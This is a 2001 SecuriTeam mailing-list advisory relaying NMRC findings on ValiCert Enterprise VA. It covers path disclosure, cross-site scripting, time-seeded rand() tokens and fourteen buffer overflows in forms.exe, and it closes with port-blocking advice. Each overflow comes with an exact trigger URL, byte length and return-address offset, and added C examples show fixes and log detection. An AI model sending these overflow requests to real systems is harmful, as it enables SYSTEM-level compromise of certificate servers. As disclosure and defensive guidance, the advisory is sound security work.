[NEWS] Multiple ValiCert Security Problems

From: support@securiteam.com
Date: 12/08/01


From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  8 Dec 2001 13:46:34 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Multiple ValiCert Security Problems
------------------------------------------------------------------------

SUMMARY

ValiCert Enterprise VA provides validity status responses for X.509
certificates and supports the following verification mechanisms:
 - Certificate Revocation Lists
 - CRL Distribution Points
 - Online Certificate Status Protocol

The Enterprise VA product architecture consists of:
 * Enterprise VA Administration Server for performing management
activities
 * Enterprise VA Host Server for processing validation requests
 * VA API for defining custom extensions to Enterprise VA.

Numerous vulnerabilities have been located in a CGI script used by the
Enterprise VA Administration Server ranging from information gathering to
system compromise.

DETAILS

Vulnerable systems:
ValiCert Enterprise VA v3.3 - 4.2.1

Issue #1 - Path disclosure
A path disclosure issue exists in the forms.exe CGI script used by
ValiCert when a new extension is added. ValiCert can be extended by
adding new extensions that are processed by custom policies. The following
URL adds the extension, ldp:
http://computer:13333/cgi-bin/forms.exe?extension=ldp&command=Add+Extension

When an invalid extension, such as foobar, is provided in the following
URL:
http://computer:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension

The server returns an error page with the following text:
Following Input/Configuration file is NOT FOUND in the required location.

FILENAME = foobar
LOCATION = D:\Program Files\ValiCert\EnterpriseVA\entserv

Make sure the file is present in the above location and try again.

This reveals the path to the ValiCert installation.

Issue #2 - Cross-site scripting problem
Due to the lack of input validation and filtering, a cross-site scripting
issue exists in the certificate creation of the ValiCert Administrative
interface. A user creating a certificate can insert HTML code into the
descriptive fields. If the certificate is viewed through the ValiCert
Administrative server, the HTML is interpreted and any scripting is
executed. As an example, HTML code can be inserted into the organizational
name that is interpreted upon certificate display. In doing so, an
attacker can display a dialog box prompting the operator to enter a
password. Though it is not possible to access unauthorized resources, it
could be used to socially engineer an individual administering the
ValiCert server into entering sensitive data.

If the Administrative server is protected with a password, only those
individuals with the proper username/password can create such a
certificate containing malicious data in the fields.
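The defensive counterpart to Issue #2 is output encoding: every descriptive field of a certificate must be HTML-escaped before the Administrative server places it in a page. The following C function is an added example written for this advisory, not code from ValiCert or NMRC; the function name, the buffer sizes and the sample organizational-name string are constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Escape the five HTML-significant characters so that a certificate field
   is rendered as text instead of being interpreted as markup or script.
   Returns the escaped length, or -1 if `out` is too small (in that case the
   output is truncated but still NUL-terminated when outsz > 0). */
int html_escape(const char *in, char *out, size_t outsz)
{
    size_t used = 0;
    for (; *in != '\0'; in++) {
        const char *rep;
        char single[2] = { *in, '\0' };
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = single;   break;
        }
        size_t len = strlen(rep);
        if (used + len >= outsz) {       /* keep room for the terminating NUL */
            if (outsz > 0)
                out[used] = '\0';
            return -1;
        }
        memcpy(out + used, rep, len);
        used += len;
    }
    if (outsz == 0)
        return -1;
    out[used] = '\0';
    return (int)used;
}

int main(void)
{
    /* Constructed sample: an organizational name carrying markup. */
    const char *org_name = "O=Example <b>Corp</b> & \"Co\"";
    char page_fragment[128];
    if (html_escape(org_name, page_fragment, sizeof page_fragment) < 0)
        return 1;
    printf("<td>%s</td>\n", page_fragment);   /* browser shows the literal text */
    return 0;
}
```

Escaping at display time protects the operator regardless of who created the certificate, so it also covers the password-protected case described above, where an authenticated but malicious user supplies the field contents.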

Issue #3 - Random key generation
ValiCert generates 'random' tokens for communication with Hardware
Security Modules (which securely store digital certificates) using the C
rand() function. Furthermore, rand() is seeded with the local system time.
Aside from the fact that the seed value is itself predictable, system clock
ticks are generally not fine-grained enough to serve as a good sole source
of entropy. Seeding with the local system time also guarantees that the
values output will increase linearly.

Finally, if the '/dev/urandom' device exists, ValiCert will use it by
default for certificate generation. Although for most purposes
'/dev/urandom' is sufficiently safe, it does not block when its entropy
pool is low. Given that within a PKI non-repudiation (in the business, not
the mathematical, sense) is paramount, the blocking behavior of the
'/dev/random' device is much more favorable.
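The weakness in Issue #3 is determinism: a token derived from rand() seeded with the clock is fully determined by a seconds value, so two callers that seed with the same value get the same token. The C program below is an added example, not ValiCert code, that places that pattern beside a version which reads the kernel device instead (it uses /dev/urandom; whether /dev/urandom or /dev/random is the right device is the point the preceding paragraph makes). The function names, the 16-byte token length and the fixed seed used in the test are constructed assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define TOKEN_LEN 16   /* constructed token size for the example */

/* The pattern the advisory describes: seed the C PRNG from a clock value
   and build the token from rand(). Every byte is a function of `seed`, so
   anyone who knows or can narrow down the seconds value regenerates it. */
void weak_token(unsigned seed, unsigned char *out, size_t n)
{
    srand(seed);
    for (size_t i = 0; i < n; i++)
        out[i] = (unsigned char)(rand() & 0xff);
}

/* Hardened form: take the bytes from the kernel CSPRNG device.
   Returns 0 on success, -1 if the device cannot be read in full. */
int strong_token(unsigned char *out, size_t n)
{
    FILE *f = fopen("/dev/urandom", "rb");
    if (f == NULL)
        return -1;
    size_t got = fread(out, 1, n, f);
    fclose(f);
    return got == n ? 0 : -1;
}

/* Byte-for-byte comparison of two tokens. */
int tokens_equal(const unsigned char *a, const unsigned char *b, size_t n)
{
    return memcmp(a, b, n) == 0;
}

int main(void)
{
    unsigned char a[TOKEN_LEN], b[TOKEN_LEN];
    unsigned now = (unsigned)time(NULL);

    weak_token(now, a, TOKEN_LEN);
    weak_token(now, b, TOKEN_LEN);   /* second caller seeding with the same second */
    printf("rand()-based tokens identical: %s\n",
           tokens_equal(a, b, TOKEN_LEN) ? "yes" : "no");

    if (strong_token(a, TOKEN_LEN) == 0 && strong_token(b, TOKEN_LEN) == 0)
        printf("/dev/urandom tokens identical: %s\n",
               tokens_equal(a, b, TOKEN_LEN) ? "yes" : "no");
    return 0;
}
```

The first line of output is always "yes", which is the whole problem: a token that any party can recompute from a coarse timestamp carries no secrecy, regardless of how many bytes it has.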

Issue #4 - Multiple buffer overflows
Multiple buffer overflows exist in the CGI script, forms.exe, which is
used by the ValiCert Enterprise VA Administration Server for management
activities. By default, the Administration Server listens on TCP port
13333 and can be configured to require a username and password for access.
Using the Apache v1.3.6 web server for Win32, the Administration Server
allows an operator to use a Web browser to:
  configure the Enterprise VA Host server
  start/stop the Enterprise VA Host server
  request product keys and licenses
  create key pairs
  add certificates
  add or modify certificate stores
  add and configure extensions
  view logs

In total, fourteen (14) independent and exploitable overflows in
parameters to forms.exe have been identified which allow code to be
executed with SYSTEM privileges. If the Administrative Server has been
configured to require a username and password for access, the attacker
requires the correct username and password to launch these attacks.

Mode overflow:
The following URL is used to switch to server configuration mode,
http://localhost:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config

Providing a mode string of 265 bytes overflows a buffer during a copy
located at 0x0040acf8 in forms.exe and overwrites the return address that
is popped off the stack at the subroutine return located at 0x0040adf9.

http://localhost:13333/cgi-bin/forms.exe?command=change_index_mode&mode={A x 265}

Analysis of the code and stack contents reveals that the unchecked buffer
is 256 bytes long, followed by two pointers or 32-bit integers on the
stack and then the return address.

Certificate_File overflow:
The following URL is used to create a Microsoft-type certificate.

Providing a Certificate_Files parameter of 1028 bytes overflows a buffer
during a copy located at 0x0040599a in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x00405cb8.

http://localhost:13333/cgi-bin/forms.exe?CertServerSelection
=Microsoft&Certificate_Type=SHARE&Certificate_Files
={A x 1028}&command=Submit+Certificate+Type

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1024 bytes long, immediately followed by the return address on the
stack.

useExpiredCRLs overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the useExpiredCRLs parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b9dc in forms.exe and overwrites the
return address that is popped off the stack at the subroutine return
located at 0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs={A x 1288}&maxOCSPValidityPeriod
=0&command=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

listenLength overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the listenLength parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b54e in forms.exe and overwrites the
return address that is popped off the stack at the subroutine return
located at 0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength={A x 1288}&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

maxThread overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the maxThread parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b5f3 in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread={A x 1288}&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

maxConnPerSite overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the maxConnPerSite parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b67f in forms.exe and overwrites the
return address that is popped off the stack at the subroutine return
located at 0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite={A x 1288}&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

maxMsgLen overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the maxMsgLen parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b70b in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
={A x 1288}&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

exitTime overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the exitTime parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b797 in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime={A x 1288}&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

blockTime overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the blockTime parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b823 in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime={A x 1288}&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

nextUpdatePeriod overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the nextUpdatePeriod parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b8af in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod={A x 1288}&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

buildLocal overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the buildLocal parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b950 in forms.exe and overwrites the
return address that is popped off the stack at the subroutine return
located at 0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal={A x 1288}&useSoftwareSigning
=Software&sslSigningType=Software&sslServerHost=&sslCertFile
=sslCert.cert&sslPrivateKey=ssl.privkey&useExpiredCRLs
=0&maxOCSPValidityPeriod=0&command=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

maxOCSPValidityPeriod overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the maxOCSPValidityPeriod parameter a value of 1288 bytes
overflows a buffer during a copy located at 0x0040ba68 in forms.exe and
overwrites the return address that is popped off the stack at the
subroutine return located at 0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod={A x 1288}&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

extension overflows:
ValiCert can be extended by adding new extensions that are processed by
custom policies. Attempting to add an extension with a file name of 995
bytes in length overflows a buffer at a sprintf located at 0x00417A9B in
forms.exe while the error message to be displayed to the client is
constructed. The long string overwrites the return address that is popped
off the stack at the subroutine return located at 0x00417AD0.

http://localhost:13333/cgi-bin/forms.exe?extension={A x
995}&command=Add+Extension

Analysis of the code and stack contents reveals that the subroutine
starting at 0x0040FEC0 makes many unchecked copies while converting the
extension parameter to an absolute filename (i.e. D:\Program
Files\ValiCert\EnterpriseVA\entserv\AAA..) and checking for existence,
etc. During the course of these copies, terminating nulls in (assumed)
fixed-length buffers containing the filename are overwritten. As a result,
the absolute filename passed to the offending sprintf call is much longer
than expected. A fix for the sprintf problem alone will still leave the
overflows in 0x0040FEC0, which may possibly be exploitable.

Private key generation overflow:
The operator can use the Administrative Server to generate new private
keys for SSL communications or use in signing OCSP responses. An overflow
exists in the processing of requests for the generation of private keys.
The following is one example of how this overflow can be triggered by
requesting a new private key for SSL communications. Long strings in any
parameter value other than the following parameters:
  country_name
  gen_self_signed_cert
  command
  keytype

will also trigger the overflow and overwrite a return address on the
stack. The following URL overwrites the return address with the
opt_company_name value (xxxx).

http://localhost:13333/cgi-bin/forms.exe?country_name=XX&state_name
=XX&locality_name=XX&org_name=XX&org_unit_name=X&common_name=X&email_address
=X@X&challenge_password={A x
833}&opt_company_name=xxxx&gen_self_signed_cert
=1&command=Submit+SW+Certificate+Request&keytype=BASIC%3BKEY_1

(URL is line wrapped)

Analysis of the code and stack contents reveals that the parameters:
  country_name
  state_name
  locality_name
  org_name
  org_unit_name
  common_name
  email_address
  challenge_password
  opt_company_name

are parsed and then reformatted using a sprintf statement called at
0x402C2E8. The destination buffer is too small to contain the results and
overflows, overwriting the return address with the value in the
opt_company_name parameter. The corrupted return address is popped off the
stack at 0x0040C58A. The following set of constraints must be met for the
overflow to occur:

  a) The country_name parameter must be exactly two bytes long; otherwise,
the offending sprintf call is never reached.
  b) The email_address parameter must be of the form string@string;
otherwise, the offending sprintf call is never reached.
  c) The total length of all parameters must be 864 bytes for the result
from sprintf to overwrite the return address. Longer lengths will cause
the buffer overflow but will also overwrite parameters passed to the
subroutine, causing the CGI script to crash before the subroutine
terminates and pops off the corrupted return address.
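All of the Issue #4 overflows share one root cause: parameter values are copied or sprintf-formatted into fixed-size stack buffers without a length check. The C code below is an added example, not ValiCert's forms.exe code, showing the two bounded forms a fix would take: a copy that refuses input larger than the destination (the 256-byte mode buffer case) and a snprintf-based reformatting of the certificate request parameters that treats truncation as an error (the private-key-generation case). The function names, the subject-string layout and the 128-byte output buffer are assumptions; the two-letter country code and string@string address checks mirror the preconditions the advisory lists for that code path.

```c
#include <stdio.h>
#include <string.h>

#define MODE_BUF_SIZE 256   /* size of the unchecked mode buffer per the advisory */

/* Bounded replacement for an unchecked strcpy-style copy: refuses input that
   would not fit together with its terminating NUL instead of writing past
   the end of `dst`. Returns 0 on success, -1 if rejected. */
int copy_param(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Bounded replacement for the sprintf that reformats the request fields.
   snprintf returns the length the full result would have had, so a value of
   outsz or more means the output was truncated; that is reported as -1
   rather than silently used. Returns the subject length on success. */
int build_subject(char *out, size_t outsz,
                  const char *country, const char *state, const char *locality,
                  const char *org, const char *org_unit, const char *common,
                  const char *email)
{
    /* Input validation (assumed policy): a two-letter country code and an
       address with a non-empty local part and domain. */
    if (strlen(country) != 2)
        return -1;
    const char *at = strchr(email, '@');
    if (at == NULL || at == email || at[1] == '\0')
        return -1;

    int n = snprintf(out, outsz,
                     "C=%s, ST=%s, L=%s, O=%s, OU=%s, CN=%s, emailAddress=%s",
                     country, state, locality, org, org_unit, common, email);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    return n;
}

int main(void)
{
    char mode[MODE_BUF_SIZE];
    char subject[128];
    char oversized[300];

    memset(oversized, 'A', 265);   /* constructed: the 265-byte mode value */
    oversized[265] = '\0';
    printf("mode=config   -> %d\n", copy_param(mode, sizeof mode, "config"));
    printf("mode=A*265    -> %d\n", copy_param(mode, sizeof mode, oversized));

    int n = build_subject(subject, sizeof subject, "US", "CA", "SF",
                          "Example", "IT", "va.example", "admin@example.com");
    printf("subject (%d): %s\n", n, subject);
    return 0;
}
```

The important habit is the second one: every sprintf that writes user-controlled data into a fixed buffer becomes a snprintf whose return value is compared against the buffer size, because snprintf alone only prevents the write, not the silent truncation.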

Vendor response:
ValiCert provided NMRC with their own advisory listing mitigation and fix
information but also informed NMRC that their advisory contains ValiCert
Inc. confidential and proprietary information. Based on this it is
unclear what information can be provided as a vendor response and all
customers of ValiCert are urged to contact support@valicert.com for more
information.

NMRC suggested solution:
NMRC offers the following suggestions to prevent these vulnerabilities
from being exploited:

If remote web administration is required, do so over an SSL connection to
prevent the admin user id and password from being captured. Otherwise,
blocking TCP port 13333, which is used for remote administration, would
prevent the overflows from being successful.
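Beyond blocking the port, the Administration Server's Apache access log gives a cheap detection signal: every overflow above needs a single parameter value of several hundred bytes, while legitimate form values are short. The C program below is an added example, not part of the advisory or of any NMRC tooling, that parses common-log-format lines and reports forms.exe requests carrying a parameter value at or above a threshold. The 200-byte threshold, the function names and the sample log lines are constructed assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumption: no legitimate forms.exe parameter value approaches this size;
   the smallest overflow in the advisory needs 265 bytes. */
#define LONG_VALUE_THRESHOLD 200

/* Returns the length of the longest parameter value in a forms.exe request
   line, 0 if the request has no query string, or -1 if the line is not a
   forms.exe request. Expects the request target inside the quoted
   "GET /cgi-bin/forms.exe?... HTTP/1.0" part of an Apache log line. */
int longest_forms_value(const char *logline)
{
    const char *req = strstr(logline, "/cgi-bin/forms.exe");
    if (req == NULL)
        return -1;
    const char *end = req + strcspn(req, " \"");   /* target ends at space or quote */
    const char *q = strchr(req, '?');
    if (q == NULL || q > end)
        return 0;

    int longest = 0;
    const char *p = q + 1;
    while (p < end) {
        const char *amp = memchr(p, '&', (size_t)(end - p));
        const char *pair_end = amp ? amp : end;
        const char *eq = memchr(p, '=', (size_t)(pair_end - p));
        int vlen = eq ? (int)(pair_end - eq - 1) : (int)(pair_end - p);
        if (vlen > longest)
            longest = vlen;
        p = pair_end + 1;
    }
    return longest;
}

/* Counts log lines that look like overflow attempts against forms.exe. */
int count_suspicious(const char *const *lines, int nlines)
{
    int hits = 0;
    for (int i = 0; i < nlines; i++)
        if (longest_forms_value(lines[i]) >= LONG_VALUE_THRESHOLD)
            hits++;
    return hits;
}

/* Constructed sample: a change_index_mode request whose mode value is
   `value_len` bytes of 'A'. Returns the line length, or -1 if buf is too small. */
int build_long_request_line(char *buf, size_t bufsz, int value_len)
{
    int n = snprintf(buf, bufsz, "10.0.0.5 - admin [08/Dec/2001:13:46:34 +0100] "
                     "\"GET /cgi-bin/forms.exe?command=change_index_mode&mode=");
    if (n < 0 || (size_t)n + (size_t)value_len + 20 >= bufsz)
        return -1;
    memset(buf + n, 'A', (size_t)value_len);
    n += value_len;
    n += snprintf(buf + n, bufsz - (size_t)n, " HTTP/1.0\" 200 512");
    return n;
}

int main(void)
{
    char attack[512];
    build_long_request_line(attack, sizeof attack, 265);
    const char *lines[] = {
        "10.0.0.5 - admin [08/Dec/2001:13:40:01 +0100] \"GET /cgi-bin/forms.exe?command=change_index_mode&mode=config HTTP/1.0\" 200 512",
        "10.0.0.5 - admin [08/Dec/2001:13:41:12 +0100] \"GET /index.html HTTP/1.0\" 200 1024",
        attack,
    };
    printf("suspicious forms.exe requests: %d\n",
           count_suspicious(lines, 3));   /* prints 1 */
    return 0;
}
```

Apache writes the query string into the access log by default, so this check needs no extra instrumentation; a 4xx or 5xx status on the same line is a further hint that the CGI process died mid-request.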

ADDITIONAL INFORMATION

The information has been provided by <mailto:advisories@nmrc.org>
Information Anarchy 2K01.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.